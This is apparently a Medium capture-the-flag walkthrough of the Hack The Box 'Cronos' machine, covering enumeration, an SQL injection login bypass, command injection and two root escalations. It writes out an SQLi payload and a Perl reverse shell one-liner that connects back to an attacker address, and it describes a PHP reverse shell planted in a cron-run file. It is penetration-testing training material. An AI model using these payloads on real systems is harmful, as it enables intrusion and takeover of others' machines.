Cronos HTB-Walkthrough

Today we are going to perform steps to crack cronos htb application. Initial local is obtained via command execution through a web application and later privilege escalation is achieved through a couple of methods. Let us check it out.

Initially, we need to perform port scanning to find open ports in the target.

Ports 53,80,22 are open

Now, let us try to enumerate all existing service details in open ports.

service enumeration using nmap tool

First, we need to perform dns enumeration whether any name server has been configured in the target or not.

ns1.cronos.htb nameserver identified
dig tool identified cronos.htb and admin.cronos doamins

Since we have identified “cronos.htb,ns1.cronos.htb,admin.cronos” values, we need to add them in /etc/hosts file.

Entries added to /etc/hosts file

Now, we will move on to the web server enumeration part.

ns1.cronos.htb page shows apache default home page
admin.cronos.htb page shows web application login page
cronos.htb shows some web page

As an initial enumeration, we will check “admin.cronos.htb” page. Becuase, we could see web application. There are a couple of methods that we can perform on the login page. Either we can perform password brute force or sql injection. We will try sql injection here.

Username: admin’ or ‘1’=’1 #

Password: password

We are able to perform sql injection successfully and eventually we are able to login into the application.

Web application home page after successful login

Since the username is vulnerable for sql injection, we can use sqlmap tool to perform complete sql injection attack as below.

user table identified via sqlmap tool
admin user credential identified

The web page is vulnerable for command injection attack as below.

ls command listed all the file in current directory
current username of web application

Now, we need to inject reverse shell code here in order to get reverse shell connection from target machine.

Reference link: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Exploit: perl -e ‘use Socket;$i=”10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Modified exploit: perl -e ‘use Socket;$i=”ip";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

We need to put our local ip address and port in the exploit.Meanwhile, let us a netcat listener in our local machine.

netcat listener started on port 443
perl payload injected in web application
reverse shell established from the target machine

Privilege escalation method:1

We can perform a privilege escalation method via kernel exploitation. As we google for “ubuntu 16.04” exploit, I can see the exploit 44298.

kernel version of cronos machine
Exploit 44298 identified

As “gcc” compiler is not installed in the victim machine, we need to compile the exploit script in any ubuntu 64-bit machine and then transfer to the attacker machine.

After transferring to the attacker machine, we can see the file as below

64-bit executable file

we need to start a local webserver on above location so that victim machine will be able to download the executable file.

root privilege shell obtained
root.txt file obtained

Privilege escalation method:2

Our next step is to identify other privilege escalation method. In order to find that out, we need to run “Linenum.sh” in the victim machine.

Note: Linenum.sh file is to enumerate privilege escalation loopholes in the victim machine.

crontab has /var/www/laravel/artisan file running every minute

Now, we need to check whether we have write permission to the “artisan” file or not.

all permission available for www-data user
artisan file is php executable file

Now, our next step is to replace the “artisan” with our malicious php reverse shell script.

We have reverse shell script existing in kali machine in below location. Moreover, we need to make a couple of tweaking. We need to change ip address and port number to get the reverse connection from the victim machine.

php-reverse-shell.php located in /usr/share/webshells/php
change ip address and port number changed as shown in the image

Firstly, we need to move malicious php file into victim machine and replace artisan file with our malicious file as below.

netcat listener started on port 4444
root shell achieved

If you like the content, please follow me on medium and LinkedIn

LinkedIn: https://www.linkedin.com/in/pravin-r-p-oscp-28497712b/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store